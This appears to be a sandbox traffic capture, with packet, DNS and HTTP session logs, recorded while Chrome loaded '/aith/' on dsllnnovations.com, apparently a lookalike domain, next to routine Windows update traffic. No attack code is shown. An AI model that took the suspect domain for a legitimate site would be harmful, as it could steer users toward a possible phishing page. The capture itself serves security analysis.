                                                Oct 30, 2024 00:23:34.301264048 CET4435832913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.549581051 CET4435832513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.550228119 CET58325443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:34.550313950 CET4435832513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.550770044 CET58325443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:34.550786018 CET4435832513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.614583015 CET4435832613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.614976883 CET58326443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:34.614998102 CET4435832613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.615530968 CET58326443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:34.615536928 CET4435832613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.684114933 CET4435832513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.684185028 CET4435832513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.684259892 CET58325443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:34.684420109 CET58325443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:34.684420109 CET58325443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:34.684458971 CET4435832513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.684489012 CET4435832513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.687803984 CET58330443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:34.687865019 CET4435833013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.687957048 CET58330443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:34.688090086 CET58330443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:34.688137054 CET4435833013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.751856089 CET4435832613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.751954079 CET4435832613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.752013922 CET58326443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:34.752125978 CET58326443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:34.752125978 CET58326443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:34.752140045 CET4435832613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.752150059 CET4435832613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.754576921 CET58331443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:34.754643917 CET4435833113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.754728079 CET58331443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:34.754869938 CET58331443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:34.754905939 CET4435833113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.767510891 CET4435832713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.767894030 CET58327443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:34.767937899 CET4435832713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.768455982 CET58327443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:34.768471003 CET4435832713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.957926989 CET4435832813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.958904982 CET58328443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:34.958967924 CET4435832813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:34.959635019 CET58328443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:34.959654093 CET4435832813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:35.075861931 CET4435832913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:35.076520920 CET58329443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:35.076559067 CET4435832913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:35.077261925 CET58329443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:35.077270985 CET4435832913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:35.098112106 CET4435832813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:35.098186016 CET4435832813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:35.098248005 CET58328443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:35.098546982 CET58328443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:35.098592997 CET4435832813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:35.098623991 CET58328443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:35.098639965 CET4435832813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:35.216645956 CET4435832913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:35.216738939 CET4435832913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:35.216797113 CET58329443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:35.217051983 CET58329443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:35.217080116 CET4435832913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:35.217108011 CET58329443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:35.217116117 CET4435832913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:35.419620991 CET4435833013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:35.420228004 CET58330443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:35.420269012 CET4435833013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:35.420850992 CET58330443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:35.420857906 CET4435833013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:35.492485046 CET4435833113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:35.492892027 CET58331443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:35.492921114 CET4435833113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:35.493405104 CET58331443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:35.493412971 CET4435833113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:35.551863909 CET4435833013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:35.551937103 CET4435833013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:35.551997900 CET58330443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:35.552257061 CET58330443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:35.552297115 CET4435833013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:35.552325010 CET58330443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:35.552340031 CET4435833013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:35.626113892 CET4435833113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:35.626168966 CET4435833113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:35.626216888 CET58331443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:35.626389027 CET58331443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:35.626408100 CET4435833113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:35.626424074 CET58331443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:35.626430988 CET4435833113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:36.831183910 CET4435832713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:36.831209898 CET4435832713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:36.831258059 CET4435832713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:36.831327915 CET58327443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:36.831403971 CET58327443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:36.831619978 CET58327443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:36.831665039 CET4435832713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:36.831697941 CET58327443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:36.831713915 CET4435832713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:24:20.728351116 CET58333443192.168.2.4142.250.185.228
                                                Oct 30, 2024 00:24:20.728401899 CET44358333142.250.185.228192.168.2.4
                                                Oct 30, 2024 00:24:20.728491068 CET58333443192.168.2.4142.250.185.228
                                                Oct 30, 2024 00:24:20.728948116 CET58333443192.168.2.4142.250.185.228
                                                Oct 30, 2024 00:24:20.728967905 CET44358333142.250.185.228192.168.2.4
                                                Oct 30, 2024 00:24:21.594250917 CET44358333142.250.185.228192.168.2.4
                                                Oct 30, 2024 00:24:21.598319054 CET58333443192.168.2.4142.250.185.228
                                                Oct 30, 2024 00:24:21.598401070 CET44358333142.250.185.228192.168.2.4
                                                Oct 30, 2024 00:24:21.598736048 CET44358333142.250.185.228192.168.2.4
                                                Oct 30, 2024 00:24:21.599554062 CET58333443192.168.2.4142.250.185.228
                                                Oct 30, 2024 00:24:21.599627972 CET44358333142.250.185.228192.168.2.4
                                                Oct 30, 2024 00:24:21.649002075 CET58333443192.168.2.4142.250.185.228
                                                Oct 30, 2024 00:24:31.603025913 CET44358333142.250.185.228192.168.2.4
                                                Oct 30, 2024 00:24:31.603094101 CET44358333142.250.185.228192.168.2.4
                                                Oct 30, 2024 00:24:31.603349924 CET58333443192.168.2.4142.250.185.228
                                                Oct 30, 2024 00:24:32.641081095 CET58333443192.168.2.4142.250.185.228
                                                Oct 30, 2024 00:24:32.641114950 CET44358333142.250.185.228192.168.2.4
                                                TimestampSource PortDest PortSource IPDest IP
                                                Oct 30, 2024 00:22:03.043658972 CET5763153192.168.2.41.1.1.1
                                                Oct 30, 2024 00:22:09.021960974 CET53594871.1.1.1192.168.2.4
                                                Oct 30, 2024 00:22:10.160274029 CET138138192.168.2.4192.168.2.255
                                                Oct 30, 2024 00:22:16.043005943 CET6122053192.168.2.41.1.1.1
                                                Oct 30, 2024 00:22:16.043344021 CET5262353192.168.2.41.1.1.1
                                                Oct 30, 2024 00:22:16.053515911 CET53631091.1.1.1192.168.2.4
                                                Oct 30, 2024 00:22:16.058315039 CET53526231.1.1.1192.168.2.4
                                                Oct 30, 2024 00:22:16.058823109 CET53612201.1.1.1192.168.2.4
                                                Oct 30, 2024 00:22:16.196664095 CET53629021.1.1.1192.168.2.4
                                                Oct 30, 2024 00:22:17.470765114 CET53627871.1.1.1192.168.2.4
                                                Oct 30, 2024 00:22:18.065269947 CET5809653192.168.2.41.1.1.1
                                                Oct 30, 2024 00:22:18.066128016 CET5595153192.168.2.41.1.1.1
                                                Oct 30, 2024 00:22:18.072670937 CET53580961.1.1.1192.168.2.4
                                                Oct 30, 2024 00:22:18.074387074 CET53559511.1.1.1192.168.2.4
                                                Oct 30, 2024 00:22:20.602931023 CET6295053192.168.2.41.1.1.1
                                                Oct 30, 2024 00:22:20.603046894 CET5745953192.168.2.41.1.1.1
                                                Oct 30, 2024 00:22:20.610199928 CET53629501.1.1.1192.168.2.4
                                                Oct 30, 2024 00:22:20.610502005 CET53574591.1.1.1192.168.2.4
                                                Oct 30, 2024 00:22:21.672103882 CET6114853192.168.2.41.1.1.1
                                                Oct 30, 2024 00:22:21.672247887 CET5792253192.168.2.41.1.1.1
                                                Oct 30, 2024 00:22:21.687709093 CET53579221.1.1.1192.168.2.4
                                                Oct 30, 2024 00:22:21.707101107 CET53611481.1.1.1192.168.2.4
                                                Oct 30, 2024 00:22:28.846652031 CET53580831.1.1.1192.168.2.4
                                                Oct 30, 2024 00:22:34.471930981 CET53586291.1.1.1192.168.2.4
                                                Oct 30, 2024 00:22:35.719146967 CET5358400162.159.36.2192.168.2.4
                                                Oct 30, 2024 00:22:36.366099119 CET53513111.1.1.1192.168.2.4
                                                Oct 30, 2024 00:22:53.409908056 CET53555271.1.1.1192.168.2.4
                                                Oct 30, 2024 00:23:15.721565962 CET53516811.1.1.1192.168.2.4
                                                Oct 30, 2024 00:23:15.863930941 CET53497321.1.1.1192.168.2.4
                                                Oct 30, 2024 00:23:18.071877956 CET6148153192.168.2.41.1.1.1
                                                Oct 30, 2024 00:23:18.072045088 CET5928253192.168.2.41.1.1.1
                                                Oct 30, 2024 00:23:18.081511021 CET53614811.1.1.1192.168.2.4
                                                Oct 30, 2024 00:23:18.081614971 CET53592821.1.1.1192.168.2.4
                                                Oct 30, 2024 00:23:44.894321918 CET53645011.1.1.1192.168.2.4
                                                Oct 30, 2024 00:24:30.515672922 CET53551521.1.1.1192.168.2.4
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Oct 30, 2024 00:22:03.043658972 CET192.168.2.41.1.1.10xb341Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                Oct 30, 2024 00:22:16.043005943 CET192.168.2.41.1.1.10x85d6Standard query (0)dsllnnovations.comA (IP address)IN (0x0001)false
                                                Oct 30, 2024 00:22:16.043344021 CET192.168.2.41.1.1.10xcc4bStandard query (0)dsllnnovations.com65IN (0x0001)false
                                                Oct 30, 2024 00:22:18.065269947 CET192.168.2.41.1.1.10xfd43Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                Oct 30, 2024 00:22:18.066128016 CET192.168.2.41.1.1.10x40c5Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                Oct 30, 2024 00:22:20.602931023 CET192.168.2.41.1.1.10x1f85Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                Oct 30, 2024 00:22:20.603046894 CET192.168.2.41.1.1.10x20ecStandard query (0)www.google.com65IN (0x0001)false
                                                Oct 30, 2024 00:22:21.672103882 CET192.168.2.41.1.1.10x2eb2Standard query (0)dsllnnovations.comA (IP address)IN (0x0001)false
                                                Oct 30, 2024 00:22:21.672247887 CET192.168.2.41.1.1.10xbcb1Standard query (0)dsllnnovations.com65IN (0x0001)false
                                                Oct 30, 2024 00:23:18.071877956 CET192.168.2.41.1.1.10xcc1Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                Oct 30, 2024 00:23:18.072045088 CET192.168.2.41.1.1.10xb6feStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Oct 30, 2024 00:22:03.052998066 CET1.1.1.1192.168.2.40xb341No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                Oct 30, 2024 00:22:03.946233988 CET1.1.1.1192.168.2.40x812dNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                Oct 30, 2024 00:22:03.946233988 CET1.1.1.1192.168.2.40x812dNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                Oct 30, 2024 00:22:16.058315039 CET1.1.1.1192.168.2.40xcc4bNo error (0)dsllnnovations.com65IN (0x0001)false
                                                Oct 30, 2024 00:22:16.058823109 CET1.1.1.1192.168.2.40x85d6No error (0)dsllnnovations.com172.67.148.212A (IP address)IN (0x0001)false
                                                Oct 30, 2024 00:22:16.058823109 CET1.1.1.1192.168.2.40x85d6No error (0)dsllnnovations.com104.21.63.172A (IP address)IN (0x0001)false
                                                Oct 30, 2024 00:22:18.072670937 CET1.1.1.1192.168.2.40xfd43No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                Oct 30, 2024 00:22:20.610199928 CET1.1.1.1192.168.2.40x1f85No error (0)www.google.com142.250.185.228A (IP address)IN (0x0001)false
                                                Oct 30, 2024 00:22:20.610502005 CET1.1.1.1192.168.2.40x20ecNo error (0)www.google.com65IN (0x0001)false
                                                Oct 30, 2024 00:22:21.687709093 CET1.1.1.1192.168.2.40xbcb1No error (0)dsllnnovations.com65IN (0x0001)false
                                                Oct 30, 2024 00:22:21.707101107 CET1.1.1.1192.168.2.40x2eb2No error (0)dsllnnovations.com104.21.63.172A (IP address)IN (0x0001)false
                                                Oct 30, 2024 00:22:21.707101107 CET1.1.1.1192.168.2.40x2eb2No error (0)dsllnnovations.com172.67.148.212A (IP address)IN (0x0001)false
                                                Oct 30, 2024 00:23:18.081511021 CET1.1.1.1192.168.2.40xcc1No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                • fs.microsoft.com
                                                • slscr.update.microsoft.com
                                                • dsllnnovations.com
                                                • a.nel.cloudflare.com
                                                • https:
                                                • otelrules.azureedge.net
                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.449738184.28.90.27443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:21:58 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept: */*
                                                Accept-Encoding: identity
                                                User-Agent: Microsoft BITS/7.8
                                                Host: fs.microsoft.com
                                                2024-10-29 23:21:58 UTC466INHTTP/1.1 200 OK
                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                Content-Type: application/octet-stream
                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                Server: ECAcc (lpl/EF06)
                                                X-CID: 11
                                                X-Ms-ApiVersion: Distribute 1.2
                                                X-Ms-Region: prod-weu-z1
                                                Cache-Control: public, max-age=48770
                                                Date: Tue, 29 Oct 2024 23:21:58 GMT
                                                Connection: close
                                                X-CID: 2


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.449739184.28.90.27443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:21:59 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept: */*
                                                Accept-Encoding: identity
                                                If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                Range: bytes=0-2147483646
                                                User-Agent: Microsoft BITS/7.8
                                                Host: fs.microsoft.com
                                                2024-10-29 23:21:59 UTC514INHTTP/1.1 200 OK
                                                ApiVersion: Distribute 1.1
                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                Content-Type: application/octet-stream
                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                Server: ECAcc (lpl/EF06)
                                                X-CID: 11
                                                X-Ms-ApiVersion: Distribute 1.2
                                                X-Ms-Region: prod-weu-z1
                                                Cache-Control: public, max-age=48823
                                                Date: Tue, 29 Oct 2024 23:21:59 GMT
                                                Content-Length: 55
                                                Connection: close
                                                X-CID: 2
                                                2024-10-29 23:21:59 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                2192.168.2.4497434.175.87.197443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:05 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=PcYCYYs6TKUBHSY&MD=NVkN5bGa HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept: */*
                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                Host: slscr.update.microsoft.com
                                                2024-10-29 23:22:06 UTC560INHTTP/1.1 200 OK
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                Content-Type: application/octet-stream
                                                Expires: -1
                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                MS-CorrelationId: 5d0347ad-323a-4dec-a932-b5d061298fc3
                                                MS-RequestId: 3ab76a29-e3a4-4466-be34-0d9283f29a66
                                                MS-CV: L2N1Ysx2Nka3/bmY.0
                                                X-Microsoft-SLSClientCache: 2880
                                                Content-Disposition: attachment; filename=environment.cab
                                                X-Content-Type-Options: nosniff
                                                Date: Tue, 29 Oct 2024 23:22:05 GMT
                                                Connection: close
                                                Content-Length: 24490
                                                2024-10-29 23:22:06 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                2024-10-29 23:22:06 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                3192.168.2.461336172.67.148.2124438052C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:17 UTC666OUTGET /aith/ HTTP/1.1
                                                Host: dsllnnovations.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                sec-ch-ua-platform: "Windows"
                                                Upgrade-Insecure-Requests: 1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: navigate
                                                Sec-Fetch-User: ?1
                                                Sec-Fetch-Dest: document
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-10-29 23:22:18 UTC1355INHTTP/1.1 503 Service Temporarily Unavailable
                                                Date: Tue, 29 Oct 2024 23:22:18 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Content-Type-Options: nosniff
                                                X-Content-Type-Options: nosniff
                                                X-XSS-Protection: 1; mode=block
                                                X-XSS-Protection: 1; mode=block
                                                Set-Cookie: uBDYBhFHjXl_RbIXqS-tq7BUSb0=1XiC77ollvFY8io8Pput6n6Dh3g; path=/; expires=Wed, 30-Oct-24 23:22:11 GMT; Max-Age=86400;
                                                Set-Cookie: EflQXmGUX8vbvWv3hKtbJ7NrWVM=1730244131; path=/; expires=Wed, 30-Oct-24 23:22:11 GMT; Max-Age=86400;
                                                Set-Cookie: 48begUgcfpxPzhtoBnETQi8kLXg=1730330531; path=/; expires=Wed, 30-Oct-24 23:22:11 GMT; Max-Age=86400;
                                                Set-Cookie: nA_Oy77kbN4-cvX8ykMiBgCG6bQ=yLaC9CgHZ9H5KH0cXoB1aKCD29A; path=/; expires=Wed, 30-Oct-24 23:22:11 GMT; Max-Age=86400;
                                                X-Frame-Options: SAMEORIGIN
                                                Cache-Control: public, max-age=0 no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                Pragma: no-cache
                                                Expires: 0
                                                cf-cache-status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=juk1jZp%2F50rc8sadSn%2BJEC3ihwPx978HFKpo4QDgdXrM2EFBmJgsXMcbs%2Bs52VXQpVkKwzsMTAnVKul0JdNxLj%2BGR2DhquxoLhGIGhVP%2Fh8hdyaHiu2qOqK3wBcu0vWS2yvT%2BCQ%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8da6e8237991ddac-DFW
                                                2024-10-29 23:22:18 UTC221INData Raw: 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 30 36 36 26 73 65 6e 74 3d 34 26 72 65 63 76 3d 36 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 34 39 26 72 65 63 76 5f 62 79 74 65 73 3d 31 32 34 34 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 32 36 37 34 30 35 33 26 63 77 6e 64 3d 32 35 32 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 30 35 37 63 34 39 37 33 65 66 65 61 31 36 63 61 26 74 73 3d 36 33 34 26 78 3d 30 22 0d 0a 0d 0a
                                                Data Ascii: alt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1066&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=1244&delivery_rate=2674053&cwnd=252&unsent_bytes=0&cid=057c4973efea16ca&ts=634&x=0"
                                                2024-10-29 23:22:18 UTC1369INData Raw: 33 33 65 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d
                                                Data Ascii: 33e3<!DOCTYPE html><html><head><meta charset="utf-8" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="viewport" content="width=device-width, initial-
